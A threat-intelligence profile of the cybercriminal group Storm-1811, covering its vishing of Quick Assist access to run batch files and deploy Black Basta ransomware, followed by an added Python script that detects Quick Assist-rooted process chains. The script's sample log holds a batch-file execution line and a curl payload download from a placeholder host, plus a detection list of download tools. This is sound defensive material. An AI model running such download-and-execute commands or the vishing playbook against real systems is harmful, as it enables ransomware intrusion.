
Storm-1811 (Cybercriminal) – Threat Actor

March 2, 2025
in Threat Actors
Storm-1811

Date of Initial Activity

April 2024

Suspected attribution

Cybercriminal

Government Affiliation

No

Motivation

Financial Gain

Associated tools

Quick Assist
Black Basta Ransomware
Batch Files
Custom Scripts
Trojan Horse WS.Malware.2

Overview

Storm-1811 is a sophisticated threat actor known for its targeted vishing (voice phishing) campaigns, which use a variety of deceptive tactics to compromise systems. The group’s recent operations involve the misuse of Quick Assist, a legitimate application designed for remote system support. By exploiting Quick Assist’s remote access capabilities, Storm-1811 tricks users into granting full control of their systems. Once access is gained, the threat actor runs malicious scripts that download batch files, setting the stage for a more damaging attack.

The primary goal of Storm-1811’s attacks is to deploy Black Basta ransomware across the compromised network. This ransomware encrypts files and disrupts organizational operations, often leading to significant data loss and financial damage. Storm-1811’s tactics reflect a high level of technical expertise and planning: the group leverages legitimate tools to bypass security measures and execute its payload.

Common targets

Storm-1811 primarily targets organizations that may have vulnerable remote access systems or insufficient cybersecurity defenses. The group’s use of Quick Assist, a tool designed for legitimate remote support, suggests a focus on entities where such tools are commonly used for troubleshooting and support purposes.

Their primary targets often include:

  • Small to Medium Enterprises (SMEs): These organizations might lack advanced security measures and are often seen as easier targets compared to larger corporations.
  • Service Providers: Companies offering IT support services, where remote access tools like Quick Assist are routinely used, can be targeted to exploit their access to multiple client systems.
  • Healthcare and Financial Institutions: Sectors with sensitive data are attractive due to the potential for high-impact ransomware attacks, which can disrupt operations and cause significant financial loss.
  • Educational Institutions: Schools and universities, which frequently use remote support tools for staff and student support, are vulnerable to such attacks.

Attack Vectors

  • Vishing (Voice Phishing)
  • Exploitation of Remote Support Tools (e.g., Quick Assist)
  • Social Engineering
  • File-based Malware (e.g., Trojan Horse WS.Malware.2)
  • Ransomware Deployment (e.g., Black Basta)

How they operate

Storm-1811 combines social engineering with technical exploitation to execute its attacks. Its primary strategy is vishing (voice phishing): the group deceives victims into providing remote access to their systems. It exploits legitimate remote support tools, such as Quick Assist, which are designed to facilitate troubleshooting by allowing one user to control another’s system remotely. By impersonating support personnel or using other manipulative tactics, Storm-1811 convinces the victim to grant full control of their system.

Once remote access is established, Storm-1811 deploys a series of malicious scripts and batch files. These files download and execute further malicious components, ultimately leading to the deployment of Black Basta ransomware, which encrypts files on the compromised system and demands a ransom payment for decryption. Because the intrusion rides on a trusted tool and a persuaded user, these techniques allow the group to bypass traditional security defenses.

Storm-1811’s operations are characterized by their focus on weaknesses in remote support processes and the group’s ability to execute complex attack sequences with minimal direct interaction. Their attacks often target organizations that use remote support tools frequently, including small to medium enterprises, service providers, and sectors with sensitive data such as healthcare and finance. By combining technical skill with psychological manipulation, Storm-1811 effectively infiltrates and disrupts its targets, making its attacks both dangerous and difficult to detect.
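The chain described above (a Quick Assist session followed by a shell running a batch file and a download utility) is something a defender can look for in endpoint process-creation telemetry. The following detection example is added here by the editor; it is not code from CyberMaterial or from either cited report. It assumes a simplified pipe-delimited record format that is constructed for illustration (real EDR or Sysmon fields differ), assumes the Quick Assist image name is `QuickAssist.exe`, and uses constructed file paths and a reserved `.invalid` hostname in the sample log. The logic is general: any suspicious process whose ancestry leads back to Quick Assist within a few hops is flagged, not only direct children.

```python
"""Flag suspicious process chains that descend from a Quick Assist session.

Added detection example, not part of the original profile. Record format
(constructed for this example):
    timestamp|host|pid|ppid|image_path|command_line
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

QUICK_ASSIST = "quickassist.exe"          # assumed image name of Quick Assist
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs")
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}

# Constructed sample telemetry: two hosts, one with a Quick Assist-rooted chain.
SAMPLE_LOG = """\
# constructed sample, not real telemetry; paths are illustrative
2025-03-02T10:00:01|WS01|4100|700|C:\\Windows\\explorer.exe|explorer.exe
2025-03-02T10:05:12|WS01|4312|4100|C:\\Program Files\\QuickAssist\\QuickAssist.exe|QuickAssist.exe
2025-03-02T10:09:40|WS01|4500|4312|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\Users\\Public\\update.bat
2025-03-02T10:09:41|WS01|4520|4500|C:\\Windows\\System32\\curl.exe|curl.exe -o C:\\Users\\Public\\stage2.zip http://example.invalid/stage2.zip
2025-03-02T10:30:00|WS02|5100|800|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\Scripts\\backup.bat
2025-03-02T10:31:00|WS02|5200|800|C:\\Windows\\System32\\curl.exe|curl.exe https://example.invalid/
"""


@dataclass
class Event:
    ts: str
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        """Lower-cased image basename; ntpath handles Windows separators on any OS."""
        return ntpath.basename(self.image).lower()


def parse_events(lines) -> List[Event]:
    """Parse the constructed pipe-delimited records, skipping blanks and comments."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, host, pid, ppid, image, cmdline = line.split("|", 5)
        events.append(Event(ts, host, int(pid), int(ppid), image, cmdline))
    return events


def quick_assist_ancestor(ev: Event, by_pid: Dict[Tuple[str, int], Event],
                          max_depth: int = 4) -> Optional[Event]:
    """Walk up the parent chain on the same host; return the QuickAssist.exe
    ancestor if one is found within max_depth hops, else None."""
    cur = by_pid.get((ev.host, ev.ppid))
    depth = 0
    while cur is not None and depth < max_depth:
        if cur.name == QUICK_ASSIST:
            return cur
        cur = by_pid.get((cur.host, cur.ppid))
        depth += 1
    return None


def is_suspicious_child(ev: Event) -> Optional[str]:
    """Return a reason string if the process matches the post-access behaviour
    described in the profile (shell running a script file, or a download tool)."""
    lowered = ev.cmdline.lower()
    if ev.name in SHELLS and any(ext in lowered for ext in SCRIPT_EXT):
        return "shell executing script file"
    if ev.name in DOWNLOADERS:
        return "download utility launched"
    return None


def flag_quick_assist_chains(events: List[Event]) -> List[dict]:
    """Alert on suspicious processes whose ancestry leads back to Quick Assist."""
    by_pid = {(e.host, e.pid): e for e in events}
    alerts = []
    for ev in events:
        reason = is_suspicious_child(ev)
        if reason is None:
            continue
        root = quick_assist_ancestor(ev, by_pid)
        if root is not None:
            alerts.append({"host": ev.host, "pid": ev.pid, "image": ev.name,
                           "reason": reason, "quick_assist_pid": root.pid,
                           "cmdline": ev.cmdline, "ts": ev.ts})
    return alerts


def run_sample() -> List[dict]:
    """Run the detector over the constructed sample log."""
    return flag_quick_assist_chains(parse_events(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for alert in run_sample():
        print(f"{alert['ts']} {alert['host']} pid={alert['pid']} "
              f"{alert['image']}: {alert['reason']} (Quick Assist pid {alert['quick_assist_pid']})")
```

On the sample, only the WS01 chain is flagged (the cmd.exe running the batch file and the curl download beneath it); the WS02 batch job and curl call have no Quick Assist ancestor and stay silent. The ancestor walk is bounded by `max_depth` so a malformed or cyclic parent relationship cannot loop forever, and processes are keyed by host and pid together because pids are only unique per host. In production the same logic should be fed from Sysmon Event ID 1 or an EDR's process-creation stream, and the allow-list of shells and downloaders tuned to the environment.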

References:
  • Storm-1811 threat actor conducts Vishing attack via Quick Assist tool
  • Storm-1811 using tech support scam to deploy Black Basta ransomware